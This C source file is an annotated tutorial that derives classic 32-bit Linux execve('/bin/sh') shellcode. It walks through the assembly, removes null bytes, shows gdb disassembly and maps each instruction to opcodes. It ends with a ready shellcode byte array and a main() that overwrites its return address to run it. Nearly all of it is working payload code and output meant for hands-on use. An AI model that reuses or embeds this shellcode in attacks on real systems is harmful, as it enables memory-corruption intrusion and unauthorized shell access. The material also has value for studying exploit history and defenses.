#include <stdio.h>


/*
    compile this first, with -static, to see how execve and exit system
    calls work

    char *arg[2];
    arg[0] = "/bin/sh";
    arg[1] = NULL;
    execve(arg[0],arg[1],NULL);
    exit(1);
*/


/*   ok, here's the reasoning behind this shellcode stuph:
     just follow the numbering...

1)   jmp (to addr of 2)     #jump to call so we can get address of string
3)   popl %esi              #esi becomes the address of our string
4)   movl %esi, 0x8(%esi)   #put ptr to ptr to string in word after string
5)   movb $0x0, 0x7(%esi)   #null-terminates string
6)   movl $0x0, 0xc(%esi)   #put NULL ptr after ptr to string 
7)   movl $0xb, %eax        #put sets eax to do system call #11 (execve)
8)   movl %esi, %ebx        #put address of string into ebx
9)   leal 0x8(%esi),%ecx    #put addr of addr of str into ecx (this is argv)
10)  leal 0xc(%esi),%edx    #put addr of null into edx (this is envp)
11)  int  $0x80             #this calls execve
12)  movl $0x1,%eax         #this sets eax to do system call #1 (exit)
13)  movl $0x0,%ebx         #this tells exit to return a 0
14)  int  $0x80             #and we're done
2)   call (addr of 3) #call instr after jmp. This pushes the address of
                      #the following string onto the stack, so we can
                      #pop it off and use it in the call to execve! is
		      #it not nifty?
     .string \"/bin/bash\"   #this is our string for exec


     NOTES: step 4 creates the argv pointer, so it looks like
             argv[0] = "/bin/sh"
	     argv[1] = NULL

	    step 5 creates the envp pointer, setting it to NULL

	    leal is 'load effective address', ie it puts the address of
	    the srce into dest, instead of the value of srce

	    some of this needs to be changed to avoid 0 bytes:

	      5,6) these both have 0 operands. change to:
	       
	          xorl %eax,%eax
                  movb %al,0x7(%esi)
                  movl %eax,0xc(%esi)

	      7) movl $0xb has 3 0 bytes. change to:

	          movb $0xb,%al

	      12,13) $0x0l and $0x1l both have 3 0 bytes. change these to:
	    
	          xorl %ebx,%ebx
		  movl %ebx,%eax
		  incl %eax
	    
            now stick this in an __asm__(" "); block in GCC and compile,
	    then fire up gdb and use 'disassemble main' to calculate the
	    offsets for the jmp and call instructions. Now yer done.
*/


/* Final shellcode - put this in gcc and play with gdb

  __asm__("
    jmp     0x1F
    popl    %esi
    movl    %esi,0x8(%esi)
    xorl    %eax,%eax
    movb    %al,0x7(%esi)
    movl    %eax,0xc(%esi)
    movb    $0xb,%al
    movl    %esi,%ebx
    leal    0x8(%esi),%ecx
    leal    0xc(%esi),%edx
    int     $0x80
    xorl    %ebx,%ebx
    movl    %ebx,%eax
    incl    %eax
    int     $0x80
    call    -0x24
    .string \"/bin/sh\"
  ");
*/

/*   compiled version
     Note that addresses will probably be different on other
     machines, but that's not important!

     0x8048398 <main>:       pushl  %ebp
     0x8048399 <main+1>:     movl   %esp,%ebp
     0x804839b <main+3>:     jmp    0x80483bc <main+36>
     0x804839d <main+5>:     popl   %esi
     0x804839e <main+6>:     movl   %esi,0x8(%esi)
     0x80483a1 <main+9>:     xorl   %eax,%eax
     0x80483a3 <main+11>:    movb   %al,0x7(%esi)
     0x80483a6 <main+14>:    movl   %eax,0xc(%esi)
     0x80483a9 <main+17>:    movb   $0xb,%al
     0x80483ab <main+19>:    movl   %esi,%ebx
     0x80483ad <main+21>:    leal   0x8(%esi),%ecx
     0x80483b0 <main+24>:    leal   0xc(%esi),%edx
     0x80483b3 <main+27>:    int    $0x80
     0x80483b5 <main+29>:    xorl   %ebx,%ebx
     0x80483b7 <main+31>:    movl   %ebx,%eax
     0x80483b9 <main+33>:    incl   %eax
     0x80483ba <main+34>:    int    $0x80
     0x80483bc <main+36>:    call   0x804839d <main+5>
     0x80483c1 <main+41>:    das    
     0x80483c2 <main+42>:    boundl 0x6e(%ecx),%ebp
     0x80483c5 <main+45>:    das    
     0x80483c6 <main+46>:    jae    0x8048430
     0x80483c8 <main+48>:    addb   %cl,%cl
     0x80483ca <main+50>:    ret    
*/



/*   now we stick the instructions above into a buffer. the equivalent
     of each instruction is as follows (in byte order)

    jmp     0x1F              0xeb 0x1f
    popl    %esi              0x5e
    movl    %esi,0x8(%esi)    0x89 0x76 0x08
    xorl    %eax,%eax         0x31 0xc0
    movb    %al,0x7(%esi)     0x88 0x46 0x07
    movl    %eax,0xc(%esi)    0x89 0x46 0x0c
    movb    $0xb,%al          0xb0 0x0b
    movl    %esi,%ebx         0x89 0xf3
    leal    0x8(%esi),%ecx    0x8d 0x4e 0x08
    leal    0xc(%esi),%edx    0x8d 0x56 0x0c
    int     $0x80             0xcd 0x80
    xorl    %ebx,%ebx         0x31 0xdb
    movl    %ebx,%eax         0x89 0xd8
    incl    %eax              0x40
    int     $0x80             0xcd 0x80
    call    -0x24             0xe8 0xdc 0xff 0xff 0xff
    .string \"/bin/sh\"       "/bin/sh"

*/

char shellcode[] = 
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/sh";

void main(){
  int *ret;

  ret = (int *)&ret + 2;
  (*ret) = (int)shellcode;
}









